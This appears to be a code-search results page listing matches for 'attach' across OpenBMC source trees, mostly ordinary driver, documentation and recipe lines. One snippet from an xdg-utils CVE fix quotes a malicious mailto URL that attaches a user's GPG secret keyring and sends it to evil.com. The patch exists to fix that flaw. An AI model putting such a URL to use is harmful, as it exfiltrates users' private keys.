Home
last modified time | relevance | path

Searched refs:attach (Results 1 – 25 of 206) sorted by relevance

123456789

/openbmc/openbmc/meta-security/recipes-mac/AppArmor/files/
H A D0001-fail.py-handle-missing-cgitb.patch50 - file.write('and attach this file.\n')
56 + file.write('and attach this file.\n')
66 - print('and attach this file.', file=sys.stderr)
68 + print('and attach this file.', file=sys.stderr)
/openbmc/openbmc/poky/meta/recipes-extended/xdg-utils/xdg-utils/
H A D1f199813e0eb0246f63b54e9e154970e609575af.patch11 mailto:sid@evil.com?attach=/.gnupg/secring.gpg
41 - ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g…
H A DCVE-2022-4055.patch128 - --attach)
130 - exit_failure_syntax "file argument missing for --attach option"
139 - options="${options}attach=${result}&"
/openbmc/phosphor-webui/app/common/directives/
H A Dserial-console.js3 import * as attach from 'xterm/lib/addons/attach/attach';
139 Terminal.applyAddon(attach); // Apply the `attach` addon
166 term.attach(ws);
/openbmc/u-boot/drivers/video/bridge/
H A Dvideo-bridge-uclass.c27 if (!ops->attach) in video_bridge_attach()
30 return ops->attach(dev); in video_bridge_attach()
H A Dptn3460.c19 .attach = ptn3460_attach,
H A Dps862x.c118 .attach = ps8622_attach,
/openbmc/sdbusplus/tools/sdbusplus/templates/
H A Dinterface.server.hpp.mako38 * @param[in] bus - Bus to attach to.
39 * @param[in] path - Path to attach at.
50 * @param[in] bus - Bus to attach to.
51 * @param[in] path - Path to attach at.
/openbmc/qemu/tests/tcg/multiarch/
H A DMakefile.target144 run-gdbstub-late-attach: late-attach
148 --bin $< --test $(MULTIARCH_SRC)/gdbstub/late-attach.py, \
160 run-gdbstub-qxfer-siginfo-read run-gdbstub-late-attach
/openbmc/u-boot/drivers/mtd/ubi/
H A DMakefile6 obj-y += attach.o build.o vtbl.o vmt.o upd.o kapi.o eba.o io.o wl.o crc32.o
H A DKconfig66 by the "attach" ioctl.
80 The on-flash fastmap contains all information needed to attach
/openbmc/u-boot/include/
H A Dvideo_bridge.h34 int (*attach)(struct udevice *dev); member
/openbmc/openbmc/poky/meta/recipes-graphics/xorg-app/
H A Dxev_1.2.6.bb6 typed in, clicked in, etc.). You can also attach it to an existing window."
/openbmc/qemu/ebpf/
H A Drss.bpf.skeleton.h30 static inline int attach(struct rss_bpf *skel);
970 int rss_bpf::attach(struct rss_bpf *skel) { return rss_bpf__attach(skel); } in attach() function
/openbmc/openbmc/meta-openembedded/meta-oe/recipes-graphics/directfb/directfb/
H A Dunion-sigval.patch19 …D_LOG( Direct_Trap, VERBOSE, "NOT RAISING signal %d from %s, waiting for %dms... attach gdb --pid=…
/openbmc/qemu/docs/system/arm/
H A Dxenpvh.rst33 -xen-attach -name guest0 -vnc none -display none -nographic \
H A Dfby35.rst35 useful because it allows you to attach to the pseudoterminals before the boot
/openbmc/openbmc/poky/meta/recipes-support/attr/
H A Dattr_2.5.2.bb2 DESCRIPTION = "Implement the ability for a user to attach name:value pairs to objects within the XF…
/openbmc/qemu/docs/system/i386/
H A Dxenpvh.rst41 -xen-attach -name g0 \
/openbmc/qemu/docs/system/s390x/
H A D3270.rst16 to actually be able to use it, attach the ``x3270`` emulator to the chardev.
/openbmc/u-boot/test/py/
H A DREADME.md6 console interface. A single top-level script exists to execute or attach to the
43 physical board, attach to the board's console stream, and reset the board.
79 The test script will attach to U-Boot, execute all valid tests for the board,
91 debug communication via the channel `COMM`. You can attach a debugger to the
118 to attach the debugger to the new sandbox instance. If these tests are not
/openbmc/qemu/docs/devel/testing/
H A Dqtest.rst70 to attach gdb to the QEMU process spawned from the test. But manual invoking
/openbmc/webui-vue/src/views/Operations/SerialOverLan/
H A DSerialOverLanConsole.vue47 import { AttachAddon } from 'xterm-addon-attach';
/openbmc/qemu/docs/system/devices/
H A Dusb.rst74 The UHCI and OHCI controllers can attach to a USB bus created by EHCI
77 controller should attach to. ``firstport`` specifies the first port the
78 controller should attach to, which is needed as usually one EHCI
255 That allows you to attach one or more scsi devices before making the
/openbmc/openbmc/meta-openembedded/meta-oe/recipes-support/nspr/
H A Dnspr_4.36.bb43 attach \

123456789